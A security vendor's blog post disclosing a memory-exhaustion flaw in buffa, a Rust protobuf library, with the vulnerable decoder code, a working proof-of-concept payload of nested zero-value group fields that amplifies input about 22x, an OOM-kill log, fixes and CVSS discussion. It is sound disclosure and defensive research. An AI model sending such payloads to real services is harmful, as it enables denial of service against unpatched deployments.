When I pointed Endor Labs' AI SAST engine at buffa, Anthropic's Rust protobuf library, it flagged a vulnerable data flow I would not have prioritized from a quick read: an unknown-field decoder that allocates heap in proportion to attacker-controlled wire data. The engine called it a potential denial of service via excessive memory allocation. The proportional allocation the engine pointed at is real but modest, roughly 2x the input. Following the same function one branch further led to a second sink that amplifies a tiny input into a heap blow-up of about 22x, which is enough to OOM-kill a process whose memory cap sits well above any sane input-size limit.
buffa ships from Anthropic, the same lab that builds frontier models, including the recently released and unreleased Mythos and Fable models, so it is about as close to model-assisted, heavily reviewed Rust as you will find. The flaw still shipped, and our AI SAST engine caught it by following the data flow end to end. The Anthropic team responded quickly to the disclosure and engaged in a productive, collaborative discussion of how severity depends on deployment.
This is a good example of Endor Labs AI SAST earning its keep on a memory-safe language. The bug is an allocation-budget flaw on a forward-compatibility code path that every buffa-decoded message routes untrusted input through, and the engine found it by following data, not by pattern-matching a dangerous call.
Affected component #
Tracked as GHSA-f9qc-qg88-7pq5 / CVE-2026-55407, Moderate (CVSS 4.0 6.3). Any message decoded from untrusted input using code generated with preserve_unknown_fields=true (the default) was affected.
The vulnerable code is decode_unknown_field in buffa/src/encoding.rs.
How AI SAST identified it #
The engine traced a length value parsed from wire data straight into a Vec<u8> allocation, with no bound between the two beyond fitting in a usize. It reported the flow stage by stage.
AI SAST output:
{
"ruleId": "AI SAST: Potential Denial of Service via excessive memory allocation due to large LengthDelimited field",
"level": "note",
"message": "decode_unknown_field allocates a Vec<u8> whose length is taken directly
from a length prefix (len) parsed from the input for WireType::LengthDelimited fields.
There is no upper bound on len beyond fitting into usize and the size of the provided
buffer. A caller can supply an arbitrarily large buffer whose contents specify an
arbitrarily large len, causing this function to attempt a very large allocation and
potentially exhaust memory, resulting in a denial of service.",
"locations": [{ "physicalLocation": {
"artifactLocation": { "uri": "buffa/src/encoding.rs" },
"region": { "startLine": 496 }
}}]
}
Identified data flow:
This is the part of AI SAST I have come to rely on. The engine did not just see a vec! and shrug. It established that len originates in untrusted input, that the only check between source and sink bounds the buffer rather than the allocation, and that the function is reachable from the default decode APIs. That is a real source-to-sink data flow on a memory-safe target, and it is the thread I pulled to find the second, amplifying vector.
The flagged sink: unbounded flat allocation #
The engine pointed at the LengthDelimited arm of decode_unknown_field. Here it is verbatim, from vendor/buffa/src/encoding.rs lines 490 through 499:
WireType::LengthDelimited => {
    let len = decode_varint(buf)?;
    let len = usize::try_from(len).map_err(|_| DecodeError::MessageTooLarge)?;
    if buf.remaining() < len {
        return Err(DecodeError::UnexpectedEof);
    }
    let mut data = alloc::vec![0u8; len]; // attacker-sized allocation
    buf.copy_to_slice(&mut data);
    UnknownFieldData::LengthDelimited(data)
}
len comes off the wire and is used directly as the allocation size. The buf.remaining() < len guard prevents an out-of-bounds read, but it does not cap the allocation. It only forces the attacker to actually deliver len bytes. The function's own docstring acknowledges this and pushes the mitigation onto callers, at lines 463 through 468:
That guidance is the load-bearing assumption I ended up disproving. It holds for this flat sink, where a caller-side input-size cap really does bound the allocation at about 2x. It does not hold one branch down.
Following the flow further: ~22x amplification in the StartGroup arm #
The same function handles StartGroup unknown fields, and that arm reads nested fields in a loop until it sees the matching EndGroup. From lines 500 through 520:
WireType::StartGroup => {
    let depth = depth
        .checked_sub(1)
        .ok_or(DecodeError::RecursionLimitExceeded)?; // bounds recursion DEPTH
    let group_field_number = tag.field_number();
    let mut nested = UnknownFields::new();
    loop {
        let nested_tag = Tag::decode(buf)?;
        if nested_tag.wire_type() == WireType::EndGroup {
            if nested_tag.field_number() != group_field_number {
                return Err(DecodeError::InvalidEndGroup(nested_tag.field_number()));
            }
            break;
        }
        nested.push(decode_unknown_field(nested_tag, buf, depth)?); // per-tag UnknownField alloc
    }
    UnknownFieldData::Group(nested)
}
The checked_sub bounds recursion depth, which stops a nested-group stack attack. It does nothing about field count inside a single group. Every loop iteration pushes an UnknownField into nested.fields: Vec<UnknownField>. On a 64-bit target an UnknownField is about 40 bytes: a 4-byte field number, 4 bytes of padding, and a 32-byte UnknownFieldData enum sized by its LengthDelimited(Vec<u8>) and Group(UnknownFields) variants.
The cheapest nested field an attacker can encode is a varint with value zero, which is exactly 2 wire bytes: a 1-byte tag and a 1-byte zero. So each 2 bytes of input produces a roughly 40-byte heap structure. That is a 20x amplification on the structures alone, plus about another 1.5x transient while the backing Vec doubles during growth. A 64 MiB payload of zero varints inside one unknown group drives the decoder to roughly 1.4 GB of heap.
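The arithmetic above can be checked with a small sketch. The types below are hypothetical stand-ins shaped like the description in this section, not buffa's actual definitions, and Rust does not guarantee struct layout, so the 40-byte figure is what a typical 64-bit build tends to produce rather than a promise. The helper names slot_bytes and retained_slot_bytes are mine.

```rust
use std::mem::size_of;

// Hypothetical stand-ins shaped like the types described above.
// These are NOT buffa's real definitions.
#[allow(dead_code)]
pub enum UnknownFieldData {
    Varint(u64),
    Fixed64(u64),
    Fixed32(u32),
    LengthDelimited(Vec<u8>),
    Group(UnknownFields),
}

#[allow(dead_code)]
pub struct UnknownFields {
    fields: Vec<UnknownField>,
}

#[allow(dead_code)]
pub struct UnknownField {
    number: u32,
    data: UnknownFieldData,
}

/// In-memory size of one retained field slot on the current target.
pub fn slot_bytes() -> usize {
    size_of::<UnknownField>()
}

/// Heap retained by the field slots when `payload_bytes` of input is filled
/// with fields that each cost `wire_bytes_per_field` bytes on the wire.
/// `wire_bytes_per_field` must be nonzero. Transient overhead from Vec
/// growth is deliberately left out.
pub fn retained_slot_bytes(
    payload_bytes: usize,
    wire_bytes_per_field: usize,
    slot_bytes: usize,
) -> usize {
    (payload_bytes / wire_bytes_per_field) * slot_bytes
}
```

With a 40-byte slot, retained_slot_bytes(64 * 1024 * 1024, 2, 40) comes to 1,342,177,280 bytes, which is the 20x structural figure before any growth overhead is added on top.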
The wire payload is trivial:
The receiving message type does not need to declare a group field. Protobuf forward-compatibility routes every unknown wire type through decode_unknown_field, so any concrete buffa-decoded message is exploitable. My POC uses google.protobuf.Empty precisely because it has zero defined fields, which makes the wire-level analysis unambiguous.
Reachable from the default APIs #
The convenience methods feed this code path with no allocation budget. From vendor/buffa/src/message.rs lines 183 through 190:
fn decode_from_slice(mut data: &[u8]) -> Result<Self, DecodeError>
where
    Self: Sized,
{
    Self::decode(&mut data)
}
Message::decode, Message::decode_from_slice, and MessageView::decode_view all reach the vulnerable sinks. The explicit DecodeOptions type does cap top-level message length, but the default is DEFAULT_MAX_MESSAGE_SIZE = 0x7FFF_FFFF, roughly 2 GiB, which is far too high to matter, and more importantly it caps input length only. It never sees the group-amplification blow-up, because that vector starts from a small input that expands during decode.
Validating it: from "survives" to OOM-kill #
I built a self-contained Cargo workspace with a POC server and attacker, vendoring buffa and buffa-types verbatim so the result is reproducible without any network access. The attacker constructs the group-amplification payload in build_group_amp. The programmatic core is just this:
use buffa::Message;
use buffa_types::Empty;
let nested_count = 33_554_431_usize;
let mut payload: Vec<u8> = Vec::with_capacity(2 * nested_count + 2);
payload.push(0x0b); // StartGroup, field 1
for _ in 0..nested_count {
    payload.extend_from_slice(&[0x08, 0x00]); // varint tag, value 0
}
payload.push(0x0c); // EndGroup, field 1
// Server side: ~1.4 GB heap from a 64 MiB input. ~22x.
let _ = Empty::decode_from_slice(&payload);
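For readers without the vendored crates, the shape of the amplification can be reproduced with a toy decoder. This is a minimal sketch under stated assumptions: Field, DecodeError, MAX_DEPTH, and every function below are hypothetical stand-ins that handle only varint and group wire types, and none of it is buffa's code. It shows the same unbounded push loop and reports wire bytes against the bytes held by the retained slots.

```rust
/// Hypothetical stand-in for a retained unknown field; not buffa's type.
#[derive(Debug, PartialEq)]
pub enum Field {
    Varint { number: u32, value: u64 },
    Group { number: u32, fields: Vec<Field> },
}

#[derive(Debug, PartialEq)]
pub enum DecodeError {
    UnexpectedEof,
    Unsupported,
    InvalidEndGroup,
    RecursionLimitExceeded,
}

/// Assumed recursion limit for this sketch only.
pub const MAX_DEPTH: u32 = 32;

/// Reads one base-128 varint and advances the slice past it.
pub fn read_varint(buf: &mut &[u8]) -> Result<u64, DecodeError> {
    let mut value = 0u64;
    for shift in (0..64).step_by(7) {
        let (&byte, rest) = buf.split_first().ok_or(DecodeError::UnexpectedEof)?;
        *buf = rest;
        value |= u64::from(byte & 0x7f) << shift;
        if byte & 0x80 == 0 {
            return Ok(value);
        }
    }
    Err(DecodeError::Unsupported)
}

/// Decodes one field. The group arm bounds depth but not field count,
/// which is the behavior under discussion.
pub fn decode_field(tag: u64, buf: &mut &[u8], depth: u32) -> Result<Field, DecodeError> {
    let number = (tag >> 3) as u32;
    match tag & 0x7 {
        0 => Ok(Field::Varint { number, value: read_varint(buf)? }),
        3 => {
            let depth = depth.checked_sub(1).ok_or(DecodeError::RecursionLimitExceeded)?;
            let mut fields = Vec::new();
            loop {
                let nested = read_varint(buf)?;
                if nested & 0x7 == 4 {
                    if (nested >> 3) as u32 != number {
                        return Err(DecodeError::InvalidEndGroup);
                    }
                    break;
                }
                fields.push(decode_field(nested, buf, depth)?); // one slot per 2 wire bytes
            }
            Ok(Field::Group { number, fields })
        }
        _ => Err(DecodeError::Unsupported),
    }
}

/// Decodes a single top-level field from `bytes`.
pub fn decode_all(bytes: &[u8]) -> Result<Field, DecodeError> {
    let mut buf = bytes;
    let tag = read_varint(&mut buf)?;
    decode_field(tag, &mut buf, MAX_DEPTH)
}

/// Same payload shape as above: one group of `nested_count` zero varints.
pub fn build_payload(nested_count: usize) -> Vec<u8> {
    let mut payload = Vec::with_capacity(2 * nested_count + 2);
    payload.push(0x0b); // StartGroup, field 1
    for _ in 0..nested_count {
        payload.extend_from_slice(&[0x08, 0x00]); // varint tag, value 0
    }
    payload.push(0x0c); // EndGroup, field 1
    payload
}

/// Returns (wire bytes, bytes held by the decoded slots, ignoring spare capacity).
pub fn measure(nested_count: usize) -> Result<(usize, usize), DecodeError> {
    let payload = build_payload(nested_count);
    match decode_all(&payload)? {
        Field::Group { fields, .. } => {
            Ok((payload.len(), fields.len() * std::mem::size_of::<Field>()))
        }
        Field::Varint { .. } => Err(DecodeError::Unsupported),
    }
}
```

The toy Field type is smaller than the 40-byte slot described earlier, so the ratio measure reports will be lower than 22x. The point is only that the ratio is fixed by slot size over wire size and does not depend on how large the input is.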
Under Docker with the server capped at 256 MiB, the 64 MiB payload OOM-kills it:
poc-server-crash | [server] reading 67108864 byte payload
poc-server-crash | [server] payload read; input buffer = 67108864 bytes
poc-server-crash | [server] calling decode...
[poc-server-crash exited with code 137]
Exit 137 with OOMKilled: true confirms the kill. The measured results separate the two sinks cleanly:
Why the docstring's advice is not enough #
The mitigation the function delegates to callers, "limit the input buffer size," is exactly the control the amplification vector defeats. A 64 MiB input cap still permits roughly 1.4 GB of allocation. The defensive perimeter has to move from the caller into the decoder. The minimum fix is a per-group nested-field count cap, which bounds worst-case amplification at a few hundred KiB per group:
WireType::StartGroup => {
    let depth = depth.checked_sub(1).ok_or(DecodeError::RecursionLimitExceeded)?;
    let group_field_number = tag.field_number();
    let mut nested = UnknownFields::new();
    let mut count = 0usize;
    loop {
        let nested_tag = Tag::decode(buf)?;
        if nested_tag.wire_type() == WireType::EndGroup { /* ... */ break; }
        count += 1;
        if count > MAX_UNKNOWN_FIELDS_PER_MESSAGE {
            return Err(DecodeError::TooManyUnknownFields);
        }
        nested.push(decode_unknown_field(nested_tag, buf, depth)?);
    }
    UnknownFieldData::Group(nested)
}
The more robust fix is to thread a global allocation budget through DecodeOptions and deduct from it on every heap allocation, both the LengthDelimited bytes and the UnknownField slots, so both vectors and any future amplification path are caught by one control. The convenience methods should then call through DecodeOptions::default() with a realistic budget (64 MiB matches prost's default) rather than the current 2 GiB. Once those land, the docstring should be corrected, since input-size caps are not a sufficient mitigation for the group vector.
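A budget of that kind might look roughly like the following. This is a sketch of the idea only: AllocBudget, BudgetExceeded, and the two charge helpers are hypothetical names and are not part of buffa's API or of the fix that shipped. Every allocation, whether payload bytes or field slots, draws down the same counter before the memory is requested.

```rust
/// Hypothetical error for an exhausted budget; not a buffa type.
#[derive(Debug, PartialEq)]
pub struct BudgetExceeded;

/// Hypothetical decode-wide allocation budget, counted in bytes.
pub struct AllocBudget {
    remaining: usize,
}

impl AllocBudget {
    pub fn new(limit: usize) -> Self {
        Self { remaining: limit }
    }

    /// Deducts `bytes`, or fails and leaves the budget untouched.
    pub fn charge(&mut self, bytes: usize) -> Result<(), BudgetExceeded> {
        self.remaining = self.remaining.checked_sub(bytes).ok_or(BudgetExceeded)?;
        Ok(())
    }

    pub fn remaining(&self) -> usize {
        self.remaining
    }
}

/// Flat sink: charge the length before allocating the buffer.
pub fn charge_length_delimited(
    budget: &mut AllocBudget,
    len: usize,
) -> Result<Vec<u8>, BudgetExceeded> {
    budget.charge(len)?;
    Ok(vec![0u8; len])
}

/// Group sink: charge for `count` field slots of `slot_bytes` each.
pub fn charge_field_slots(
    budget: &mut AllocBudget,
    count: usize,
    slot_bytes: usize,
) -> Result<(), BudgetExceeded> {
    let bytes = count.checked_mul(slot_bytes).ok_or(BudgetExceeded)?;
    budget.charge(bytes)
}
```

In a real decoder the group arm would charge one slot per loop iteration, so the error surfaces as soon as the budget runs out rather than after the whole group has been materialized.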
What shipped
The fix landed in buffa and connectrpc 0.8.0. It enforces a per-message unknown-field count limit, configurable, defaulting to 1 million unknown fields, which caps allocation overhead at roughly 40 MiB per message. That is the count-cap approach above, applied as a general per-message control rather than only to the group arm. Users who cannot upgrade immediately have a second option: regenerate their code with preserve_unknown_fields=false, which removes the unknown-field retention that feeds the sink entirely.
Impact: why severity depends on the deployment #
The most interesting part of this finding is that it does not have a single correct severity. The amplification ratio is a fixed property of the code, but whether that ratio translates into a momentary blip or a critical outage depends entirely on how the consuming service is built. I think it is worth laying out that spectrum explicitly, because a reader running buffa needs to score it against their own architecture rather than inherit anyone else's number.
The two sinks sit at different points on that spectrum to begin with. The flat LengthDelimited sink is roughly 2x and is genuinely bounded by a transport-level input-size cap, so I am comfortable with it sitting around the 6.3 (Medium) that was assigned. A caller who caps input at, say, 4 MiB has bounded the allocation at about 8 MiB, and that is the end of it. The group-amplification sink is the one where severity moves, because the ~22x factor breaks the assumption that an input cap bounds memory.
Here is the same vulnerability across deployment profiles, from least to most severe:
The nuance I pressed during disclosure is that the two metrics driving the score, attack requirements and availability impact, are both deployment-dependent for the amplification vector, and the favorable reading is not the general case.
On attack requirements: the justification for treating exploitation as conditional was that it needs the library deployed on an externally-reachable decode path with the input-size limit raised above the default. For the amplification vector specifically, that is the exact condition the bug defeats. The attacker does not need a raised cap; they need cap × 22 > available memory, which holds under common defaults. A 4 MB gRPC limit is already enough. So for that vector I would argue the requirements stay low rather than becoming a meaningful precondition, and that network reachability is already captured once by the attack-vector metric rather than a second time as an added requirement.
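The cap × 22 inequality is easy to evaluate for a given deployment. The sketch below assumes a 4 MiB input cap and reuses the 256 MiB memory limit from the POC; the function names are hypothetical, and the model ignores every other allocation in the process.

```rust
/// Worst-case decoder heap for one request: input cap times amplification.
pub fn worst_case_heap(input_cap_bytes: u64, amplification: u64) -> u64 {
    input_cap_bytes.saturating_mul(amplification)
}

/// Smallest number of concurrent maximum-size requests whose combined
/// worst-case heap exceeds `available_bytes`.
pub fn requests_to_exhaust(input_cap_bytes: u64, amplification: u64, available_bytes: u64) -> u64 {
    let per_request = worst_case_heap(input_cap_bytes, amplification);
    if per_request == 0 {
        return u64::MAX; // nothing is ever allocated in this model
    }
    available_bytes / per_request + 1
}
```

Under those assumptions a single 4 MiB request can reach about 88 MiB of heap, so three concurrent requests are enough to exceed 256 MiB, while a 64 MiB cap is exceeded by one request on its own.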
On availability: scoring it as a transient single-worker crash assumes effective rate-limiting on the decode path and automatic recovery that actually recovers. The trigger here is small, unauthenticated, and perfectly repeatable, so a worker that auto-restarts can be driven straight back into another OOM. That is a crash-loop, which reads as sustained unavailability rather than graceful degradation, and the library does not itself provide the rate-limiting that would prevent it.
None of this is a disagreement that 6.3 is correct for a specific, well-supervised, rate-limited deployment. It is an argument that the same code reaches the High-to-Critical range for the file-ingestion and default-gRPC profiles, and that consumers should score the vector against their own concurrency limits, memory headroom, and recovery behavior. That is also the case for a CVE: a tracked identifier lets each consumer evaluate their own exposure instead of assuming the most favorable deployment.
Disclosure #
I reported both vectors to Anthropic through their bug bounty program, and the experience was genuinely collaborative from start to finish. The team validated the report quickly, confirmed both vectors reproduce as described, and explicitly agreed the group-amplification analysis was correct. When I pushed back on the initial rescore, they did not wave it off. They walked me through exactly which CVSS 4.0 metrics they were using and the deployment assumptions behind each one, which is precisely the kind of transparent, technical back-and-forth that makes coordinated disclosure work well. We did not land in the same place on every metric, but the disagreement was substantive and respectful on both sides, and I came away with a clear understanding of their reasoning.
Anthropic scored the issue against their own deployment profile, multiple supervised replicas with automatic restart, and settled on CVSS 4.0 6.3 (Moderate) with a $600 bounty. They shipped the fix in buffa and connectrpc 0.8.0, requested a CVE, and the issue is now tracked as GHSA-f9qc-qg88-7pq5 and CVE-2026-55407. Throughout, the team was responsive, willing to engage on the hard scoring questions, and accommodating on disclosure timing and CVE tracking. It is a good example of a vendor security team treating an external researcher as a partner, and I appreciated working with them on it.
Takeaway #
What I want to highlight is the workflow. AI SAST established a true data flow from untrusted wire bytes to an unbounded allocation on a path reachable from the default API, on a memory-safe Rust target where there is no overflow to grep for. That is the hard part of triage. Following that flow one branch further, into the group decoder, is where the 22x amplification lived. The engine put me on the function that mattered, and the rest was validation.
That it found this in buffa, a library from a frontier-model lab, developed by its own models, is its own small comment on the value of analysis built specifically to trace untrusted data to dangerous sinks. One DoS in one library does not prove much on its own. But the path from source to sink was there to be found, and the tool built for that job is the one that found it.